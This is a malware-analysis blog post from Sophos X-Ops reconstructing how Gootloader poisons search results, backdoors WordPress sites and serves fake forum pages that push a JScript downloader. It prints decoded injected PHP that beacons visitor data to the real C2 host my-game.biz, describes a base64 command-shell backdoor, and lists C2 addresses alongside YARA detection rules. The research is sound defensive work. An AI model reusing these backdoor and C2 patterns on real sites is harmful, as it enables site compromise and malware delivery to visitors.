Gootloader inside out
Credit to Author: Gabor Szappanos| Date: Thu, 16 Jan 2025 17:00:02 +0000
The Gootloader malware family uses a distinctive form of social engineering to infect computers: Its creators lure people to visit compromised, legitimate WordPress websites using hijacked Google search results, present the visitors to these sites with a simulated online message board, and link to the malware from a simulated “conversation” where a fake visitor asks a fake site admin the exact question that the victim was searching for an answer to.
Most of the infection process is driven by code that runs on the compromised WordPress server and another server we have previously named “the mothership” that orchestrates an elaborate and complex dance to dynamically produce a page that seemingly answers the exact question you’re asking. Gootloader’s operators make behind the scenes, almost unnoticeable changes to the compromised WordPress sites that cause those sites to load the extra content from the mothership.
Every aspect of this process is obfuscated to such a degree that even the owners of the compromised WordPress pages often cannot identify the modifications in their own site or trigger the Gootloader code to run when they visit their own pages. At the same time, unless you control one of the affected WordPress sites, it can be very difficult (if not impossible) to get a hold of this code to study it: The modified WordPress database entries and PHP scripts that comprise Gootloader reside only on the compromised server, where security researchers normally cannot access them (barring physical or shell access to the server, itself).
Sophos X-Ops has previously reported on various aspects of Gootloader. However, Sophos X-Ops has reconstructed how Gootloader’s server-side operations function, using breadcrumbs and clues left by both the threat actors (and by other security researchers) published in open-source tools around the internet. We have pulled this collective knowledge together into this report.
In this post, I’ll explain how I was able to reconstruct how the malicious SEO works; how the landing page code on the initial, compromised website validates visitors then redirects some of them to a second website; how the Gootloader operators use the second website to generate a realistic-looking message board dynamically; how the multi-stage infection process works; and how all of these parts are orchestrated by a “mothership” server, controlled by Gootloader’s operators, to control who gets attacks, and which visitors get bounced back to Google’s homepage.
Gootloader’s poisoned SEO
Gootloader has been using a virtually unchanged malicious SEO method for nearly eight years. When we have done threat hunting in the past, we’ve used our own telemetry to find the key phrases Gootloader used to deliver a malicious JScript file: Gootloader always names these first-stage files to match the search phrase that led the victim into the trap.
Finding new names for these first-stage downloaders also means discovering new phrases the Gootloader operators are using as lures. It was VirusTotal’s live hunting and retrohunting services that led us to these updated payloads, despite the fact that Gootloader’s creators use code obfuscation to an almost absurd degree. We had to come up with creating threat hunting queries such as the following Yara rule:
rule gootkit_js_stage1 { strings: $a1 = /function .{4,60}{return .{1,20} % .{0,8}(.{1,20}+.{1,20});}/ $a2 = /function [w]{1,14}(.{1,14},.{1,50}) {return .{1,14}.substr(.{1,10},.{1,10});}/ $a3 = /function [w]{1,14}(.{1,50}) {return .{1,14}.length;.{1,4}}/ $a4 = /function [w]{1,14}(.{0,40}){.{0,40};while ([w]{1,20} < [23][d]{3}) {/ $b1 = /;WScript.Sleep([d]{4,10});/ $b2 = /function [w]{1,14}(.{0,40}) {.{0,40};while([w]{1,20}<([w]{1,14}*[d]{1,8})){[w]{1,14}++}}/ condition: all of ($a*) and any of ($b*) }
While this rule was effective at the time of our research, Gootloader’s operators have subsequently modified the JScript to render this search obsolete. In order to stay on top of these changes, we needed to analyze newer versions of the heavily obfuscated JScript code.
As part of the obfuscation, the attackers break up the code. Every elementary capability is implemented in a separate function, initially featuring randomly generated variables, then later switching to variable names selected from a dictionary.
In the example above, $a1, $a2, and $a3 match functions that performed the elementary tasks in the decryptor.
$a1 matches the function that determines the parity of a number, matching this obfuscated form:
function dance(expect,support,thin,foot,had){return expect % (magnet+magnet);}
$a2 matches the function that returns a substring from a string, matching this obfuscated form:
function supply(spoke,seed,your,build,charge,carry,sat) {return spoke.substr(seed,your);}
$a3 returns the length of a string, matching this obfuscated form:
function verb(consonant) {return consonant.length; }
$a4 implements the main decoder loop: it contains the length of the encoded part (somewhere between 2000 and 4000 bytes), matching this obfuscated form:
function wave(down){against=kill;hole="";while (against < 2146) {spell=cause(down,against);hole=cool(hole,spell,against); against++; }return hole;}
The code used long delays to make dynamic analysis more difficult, extending to hours the time needed to properly run the code.
Initially, Gootloader used the WScript.Sleep function (matched by $b1) to create this delay. Over time, Gootloader’s creators replaced this with a less recognizable implementation (matched by $b2), like this function, which essentially increments a counter for a very long time:
function string2(evening6) { sky0=25; while(sky0<(evening6*4921)){ sky0++ } }
Even though the code is highly obfuscated, knowing the structure of the code enabled us to create the above seemingly loose Yara rule – which caught thousands of first stage downloader scripts with zero false positives.
Once we had the original file names, we had the search terms. With those, we could find the landing pages: The Gootloader operators were successful in manipulating the search results and the compromised landing sites, such that they end up near the top of the search results (even in the first result, as in the example below):
How did the malicious pages end up at the top of the search results?
We were able to learn how the malicious SEO was so effective by inspecting the HTML source of the search landing pages.
There is a hidden element, the name of which is actually a server ID, used at many places in the code (a47ec48 in the following example). It starts with the letter ‘a’ followed by 6 hexadecimal characters:
<div id="a47ec48 "> ... <div><script type="text/javascript"> document.getElementById("a47ec48 ").style.display="none"; </script>
That hidden element had links (selected with green) and the matching targeted search terms (selected with brown):
This hidden element will not be visible to human webpage visitors. But search engine crawlers see and process it, which tricks the search engines into treating the website as if it provides relevant content on the poisoned search term, thus ranking the site high in the search results.
Compromised landing page code
When security vendor Sucuri wrote up a blog post about an earlier generation of Gootloader, it included this screenshot:
The report (and screenshot) revealed three promising strings:
- The request: $_GET[‘a55d837’
- A malicious web domain name: ‘my-game[.]biz’
- A SQL query (shown on a different screenshot in Sucuri’s blog): ‘SELECT * FROM backupdb_’
Searching Google for code fragment $_GET[‘a55d837’ led us to an online decoder page, where the result (now deleted) of another researcher’s query revealed the encoded version of the PHP code used in the malicious web page:
function qwc1() { global $wpdb, $table_prefix, $qwc1; $qwc2 = explode('.', $_SERVER["x52105x4d117x54105x5f101x44104x52"]); if (sizeof($qwc2) == 4) { if ($wpdb - > get_var("x53105x4c105x43124x20105x58111x53124x5340x28123x45114x45103x5440x2a40x46122x4f115x20142x61143x6b165x70144x62137".$table_prefix. "x6c163x74141x7440x57110x45122x4540x77160x2075x2047".$qwc2[0]. '|'.$qwc2[1]. '|'.$qwc2[2]. "x2751x3b") == 1) {
and the decoded version of that same script:
function qwc1() { global $wpdb, $table_prefix, $qwc1; $qwc2 = explode('.', $_SERVER["REMOTE_ADDR"]); if (sizeof($qwc2) == 4) { if ($wpdb - > get_var("SELECT EXISTS (SELECT * FROM backupdb_".$table_prefix. "lstat WHERE wp = '".$qwc2[0]. '|'.$qwc2[1]. '|'.$qwc2[2]. "');") == 1) {
While it isn’t clear how the code ended up on that website, the Internet never forgets: Search engines found and indexed this analysis. This gave us the first insight at what the injected code of the compromised landing pages would look like.
(Both the analysis linked above, and another page I subsequently found on malwaredecoder.com, were later removed by their respective site owners. Search results that reveal ephemeral analysis pages like these are only available for a short period of time. If you plan to cite source materials from sites such as these, keep an offline copy of the page, because they may not be there when you return.)
At this point we didn’t know exactly how the sites are compromised, but we knew from the report that malicious PHP code is somehow inserted into the WordPress installation.
The search on Virustotal for content:”SELECT * FROM backupdb_” gives a couple of files from a compromised server that contain an error message:
<div id="error"><p class="wpdberror"><strong>WordPress database error:</strong> [Table 'interfree.backupdb_wp_lstat' doesn't exist]<br /><code>SELECT EXISTS (SELECT * FROM backupdb_wp_lstat WHERE wp = '117|50|2');</code></p></div><!DOCTYPE html>
The criminals are likely using the database backupdb_wp_lstat, which must have been removed from the server during a cleanup. We were hunting for this content on VirusTotal (search term: content:”backupdb_wp_lstat”), hoping we would stumble upon a database dump. It is always a good idea to set up these rules and do additional retrohunts, which can reveal other valuable files or data.
We were lucky, and found an archive file containing a SQL dump of the WordPress database from a compromised server on a public malware repository.
The dumped database contains a table called backupdb_wp_lstat. Later analysis determined that this table contains the IP address blocklist the malicious website uses to prevent repeat visits.
The obfuscated PHP code was also viewable in the database dump:
…as was the injected SEO poisoning content, with the j$k..j$k marker:
Researchers who want to hunt for this identifiable string in the Descriptions property of the malicious landing pages can use the regex /j$k([0-9]{1,10})j$k/
This marker serves as placeholder for the spot where Gootloader’s link to the page renderer script is inserted. When the Gootloader page is served up, it excludes the marker from the page source.
However, the code extracted from the SQL database dump was not exactly the same as what was shown in the Sucuri blog. We continued searching for more examples by pivoting on the C2 server my-game[.]biz, and found a handful of PHP files referring to that server:
The submission name commented_functions.php looked promising. Indeed, it turned out to be likely the work of a researcher, analyzing the PHP source code from the compromised WordPress installation. It was kindly documented in detail, saving us some analysis time (which also helped because we didn’t have all the components).
We were able to use the base64 string referenced in the “html” comment above to search VirusTotal, which led us to a (relatively) recently uploaded SQL dump.
The dump file contained the previously referenced base64 blob…
…which, when decoded, output the same code that was originally published by Sucuri:
With this in hand, we had greater confidence in the provenance of this malicious code. We also identified the table where Gootloader stores it in a compromised WordPress database. Having located the dump of the WordPress database and the PHP code on the online decoder site, we have a complete copy of the malicious content hosted on the compromised landing sites.
What’s in the landing page code?
This code contains a simple PHP command shell, which the Gootloader attackers can use to maintain access to compromised pages.
The variable $pposte holds the name of the parameter that gets executed. If the compromised website receives an HTTPS POST with that string in it, the code on the page will decode and execute any base64 encoded commands it receives, turning into a bare-bones command shell the attackers can use to maintain control over the server:
At other points inside the code, the script defines filters for WordPress events, which trigger the execution of functions based on predefined conditions.
For example, the following function executes once the attackers have set up the compromised WordPress environment: the invoked code (referenced as “qvc5”) initializes the backupdb_wp_lstat database table.
add_action("wp", "qvc5");
This snippet from the qvc5() function initializes the backend databases used by Gootloader:
if ($table_prefix < > "backupdb_".$qvc4) { $table_prefix = "backupdb_".$qvc4; wp_cache_flush(); $qvc5 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST); $qvc5 - > set_prefix($table_prefix);
On preparing the requested web page, the malicious event handler hooks build the request to the “mothership” (a name I’ve given to the website the Gootloader operators use to centrally manage their fleet of compromised blogs). The communication sends the mothership the following parameters of the initial request, all in base64 encoded form:
- a: Unique server ID
- b: IP address of the unsuspecting visitor
- c: user agent
- d: referrer string
if (isset($_GET[$qwc4])) { $request = @wp_remote_retrieve_body(@wp_remote_get("http://my-game.biz/index.php?a=".base64_encode($_GET[$qwc4]). '&b='.base64_encode($_SERVER["REMOTE_ADDR"]). '&c='.base64_encode($_SERVER["HTTP_USER_AGENT"]). '&d='.base64_encode(wp_get_referer()), array("timeout" => 120)))
One of Gootloader’s most problematic behaviors is that it only allows the potential victim to visit the site once in a 24-hour period. It does this by adding the originating IP address of this communication (the address of the victim PC, variable ‘b’ above) to a block list. The server also geofences IP address ranges, and only allows requests to originate from specific countries of interest to the Gootloader threat actor. The referrer string (variable ‘d’ above) contains the original search terms.
This results in a query that looks like this:
http://my-game.biz/index.php?a=YWFkZTVlZQ&b=ODUuMjE0LjEzMi4xMTc&c=TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg4LjAuNDMyNC4xNTAgU2FmYXJpLzUzNy4zNg&d=Z29vZ2xlLz9xPWNpc2NvX3dwYV9hZ3JlZW1lbnQ
(In this example, the “&d=” referrer string is the base64-encoded value of “google/?q=cisco_wpa_agreement”)
Later, we will see that the server’s response will be the fake forum page renderer code.
The mothership sends the fake forum page
The mothership response contains two parts: one contains the HTML header elements, and the other contains the page body content. The two are delimited in the code by a <sleep> tag.
The header part contains multiple elements, separated by pipe (“|”) characters. Using what it gets from the mothership, the landing page code will gather the HTML content:
The script adds the entire /24 IP address range where the request originated to a 24-hour block list. Neither the originating computer, nor any others with the same initial three sets of numbers in its IP address, can get the page again for at least a day. (This was already seen in the SQL database dump):
How Gootloader renders the fake forum page
If the request comes from an IP address that isn’t on the block list, the malicious code in the compromised WordPress database takes action and delivers the bogus message board content (typically titled simply “Questions And Answers”) to the visitor’s browser.
The only visible malicious content in the source code of a compromised landing page is a simple inserted JavaScript tag. For example:
https://powerstick.com/main/?ad94610=1174868
Here, again, the unique key for the infected server is used as a parameter assigned to a numeric value (1174868 in the above example):
This <script> tag will invoke the landing page renderer function from the code stored in the WordPress database.
If the HTTPS GET request contains a query string that includes the infection ID, the handler code sends a request to the mothership and renders the response.
We are able to get the code returned by the mothership by grabbing the fake landing page HTML source, and using a web debugger that records the on-the-fly changes.
First it deletes the original content of the HMTL page:
…and replaces it with the fake forum text…
…which also contains the download link for the first stage JScript payload:
The result will look like a conversation in the blog comments in which someone “asks” a question identical to the search query passed from the Google referrer text, a “response” appears from a user account named Admin with the search term hotlinked to the first stage JScript downloader, and a followup “response” from the same “user” who “asked” the initial question, thanking the admin who “answered.”
The entire conversation is a fiction. It follows this pattern in every Gootloader incident.
The first-stage downloader site
The fake forum page connects to the first stage download server, where a PHP script serves the first stage JScript downloader script.
(We received a copy of this script from another researcher in the security community, who wishes to remain anonymous, under TLP:Red restrictions. While we couldn’t use the script we received in this blog post, we could use characteristics of the script to hunt for similar samples.)
On the server side, this file is embedded as a large Base64-encoded data blob, with text that begins:
<?php $a=base64_decode('ZnVuY3Rpb24...
With this information, we could search for similar scripts, using this Yara rule:
rule gootkit_stage1_dl{ strings: $a = "<?php $a=base64_decode('ZnVuY3Rpb24" condition: all of them }
This gave us a handful of other variants of the script, with the main difference being the download URL:
- c20a040acb10e820cfaaa086bdc807ffed6241bc5d0fc9e11a02a5d355125df0
- 5b5652c6ea0c0c88105baf6a700324bdf2cd8f47772a3215f721dccdce9141c4
- 744951acfd9456fc59086b81d494c7092cda9968073d32ded64ac09291644bd9
- 361fab9858a9bc4a120e67baa01fd5bc4918d20b32bb918a8faacb143f418ac8
We observed two mothership addresses, 5.8.18[.]7 and my-game[.]biz in the samples we studied. At the time we initially researched this, the my-game domain resolved to that IP address (it now resolves elsewhere). Oddly, the compromised landing page code links to the domain, and the first stage JScript downloader links to the IP address.
The first stage download script (down.php or join.php or about.php or index.php) simply relays the incoming request to the mothership:
The request sent to the mothership will return the first-stage downloader JScript packaged in a Zip archive. Because it passes the original referrer string all the way to the mothership, it will receive the original search terms, and can return a payload with a file name matching these search terms, which is what we’ve observed happens.
How Gootloader compromises WordPress servers
Near the end of our initial research, we found an important piece of information about the likely source of the initial compromise of the hosting WordPress servers. As we gather more information, it’s worth revisiting prior research, which may reveal clues that we didn’t know were related at the time.
The writeup describes an attack where attackers placed a modified copy of the Hello Dolly plugin in the WordPress uploads directory (e.g. wp-content/uploads/), which they then used to initiate the installation of the malicious WordPress content.
HelloDolly.php has been a stock plugin, included with the WordPress self-hosted download, for many years. In any case, modifying this code in a relatively benign plugin, and leaving it in place on the compromised server, allows Gootloader to operate in plain sight while minimizing the filesystem changes that might reveal a compromise to an alert webmaster.
There are several ways in which a threat actor might be able to place a file into a WordPress site: The credentials for the web server might have been phished or stolen; a WordPress component may have had a vulnerability that permitted remote users to perform SQL injection or command execution exploits on the host server; the administrative WordPress password might have been stolen.
In this case, the writeup contains a screenshot:
We searched VirusTotal for more of these files:
content:"dolly_css"
While we found several clean, original versions of the HelloDolly.php file…
- 2c5717200729f76b857a8a32608b72fd3c15772dfcc607bebfc3b36f8ab2a499
- 2c3d2a55349efe8b636350b58181d930a73e0d0ede59dcaadc47d9a56dd15127
…we found many more where the backdoor code had been injected…
- 03a46ad7873ddb6663377282640d45e38697e0fdc1512692bcaee3cbba1aa016
- 1fcc418bdd7d2d40e7f70b9d636735ab760e1044bb76f8c2232bd189e2fd8be7
- 258cb1d60a000e8e0bb6dc751b3dc14152628d9dd96454a3137d124a132a4e69
- 5d50a7cf15561f35ed54a2e442c3dfdac1d660dc18375f7e4105f50eec443f27
- 7bcffa722687055359c600e7a9abf5d57c9758dccf65b288ba2e6f174b43ac57
- af50c735173326b2af2e2d2b4717590e813c67a65ba664104880dc5d6a58a029
…and we also found a few Zips that contained complete copies of compromised WordPress installations:
- 89672c08916dd38d9d4b7f5bbf7f39f919adcaebc7f8bb1ed053cb701005499a
Here, the malicious HelloDolly PHP script is installed as a WordPress plugin under the path:
wp-contentpluginsHello_DollyHelloDolly.php
The malicious PHP files show the additional code, along with the original Hello Dolly lyrics. An inserted code will check the POST request for specific parameters, and if found, will execute the submitted installation code.
We found other variations where the $dolly variables are renamed $wp
The research blog post summarizes the process like this:
We found these components in the SQL database dumps, giving us enough confidence to establish that this was (at least) one way the attackers compromised these legitimate WordPress sites to turn them into distribution servers.
Docking with the mothership
The mothership server plays a central role orchestrating the early stages of the infection process: It provides the fake forum content that the compromised sites display in the target’s browser, as well as the first stage payload.
Unfortunately, because this has all been maintained on a server that is directly controlled by the threat actors, whatever source code it may contain is not available to researchers.
Disturbingly, since 2018 when Gootloader first appeared on the scene, it has used the same domain, and for most of that time, the domain pointed to most of the same IP addresses.
5.8.18[.]7
The my-game[.]biz domain resolved to this IP address for several years. Many of the malicious scripts point directly at URLs hosted on this IP address to deliver components of the infection.
Known URLs:
http://5.8.18[.]7/filezzz.php
The initial components of the infection are files known as Gootkit. They are usually just PHP scripts that contain a base64-encoded string and a script to decode the data and output it to a variable, such as this file (variably referred to as join.php or down.php).
We were also able to identify several Gootkit files that refer to, or link to, this IP address, including this script, and this script. Both of these files contain error messages that refer to something not being able to completely download a component.
Interestingly, the server-side downloader script was named file_tmp_41.php, which is unlike the downloader scripts seen normally. That may indicate this script was an artifact of testing.
If we pivot off of this information, and (for example) search VirusTotal for content:”<?php $a=base64_decode(‘ZnVuY3Rpb24″ . The result yields additional files, both of which contain a URL that we’ve previously discussed:
http[:]//5.8.18.7/filesst.php?a=$i&b=$u&c=$r&d=$h&e=$g
5.8.18[.]159
This was another address that my-game[.]biz has resolved to in the past. We were able to find another first-stage Gootkit component that links directly to this IP address.
91.215.85[.]52
Yet another IP that has been used to host my-game[.]biz and continues to do so. We found still another first-stage Gootkit script that links to this IP address.
my-game[.]biz
The site is blank now, but the Internet Archive reveals an interesting origin story to this domain: In 2014, it was used to host a Russian online gambling site. Since 2018, the page has hosted no other content but has been linked to the Gootkit/Gootloader malware.
The only other reference we could find to the domain was a Counter-Strike clan directory dating back more than 15 years.
The directory lists this website as the home page for a group of “semi professional” players based in Germany who played under the handle #mY-GaMe.
Name: #mY-GaMe Clan-Tag (Kürzel): #mY-GaMe` Land (Hauptsitz des Clans): Deutschlandweit Ort (Hauptsitz des Clans): Deutschlandweit Leader: pr0nb1tch ICQ#: 256558686 Homepage: http://www.my-game.biz Anzahl der Spieler: 10 Art der Spielmodi: Leaguez Clan-Profil: Semi-Profi-Clan Clan sucht neue Spieler: Ja Leader: kevin.goe@online.de
Open-source intelligence reveals a lot
With a malware infection method seemingly designed to make it as difficult as possible for researchers to dig in and learn how it works, Gootloader remains one of the most pernicious and difficult-to-study threats on the web.
However, despite most of its code existing and running inside of other people’s WordPress servers, the proliferation of online analysis tools provides a rich pool of opportunity to learn how the malware works, and how its loader delivers payloads. Thanks to the resources uploaded by a variety of different analysts and researchers, we’ve been able to build a nearly complete picture of how the malware operates.
The PHP scripts, embedded JavaScript components, and downloadable JScript payloads of this infection are now well understood, and yet the malware continues to have an impact, more than six years after it was first discovered. Fortunately, due to the relatively sluggish pace of the malware’s development and its relatively stable hosting of the “mothership” server, static and dynamic detections remain effective.
And a final note about collaborative research projects. It pays to develop and maintain relationships with the malware analysis and security research community. For this project, we received help from several researchers, some of whom did not want to be acknowledged. Our advice: If you do this kind of work, don’t hesitate to share your findings; you will find that the effort you invest in collaboration with colleagues across the industry will eventually pay off when you need information. We are grateful for the support and help we received from several individuals.
Acknowledgments
Sophos X-Ops gratefully acknowledges the contribution of Marv Ahlstrom, an SEO expert who advised us about various aspects of Gootloader/Gootkit’s malicious SEO. The author also wishes to thank the pseudonymous researchers who use the handles @sS55752750, @SquiblydooBlog, and @GootLoaderSites for their assistance. We also recognize and are grateful for research previously published by Sucuri and Rich Infante. X-Ops researcher Andrew Brandt contributed to this analysis.
Indicators of compromise
Hashes and other IOCs referenced in this story are listed on the SophosLabs Github.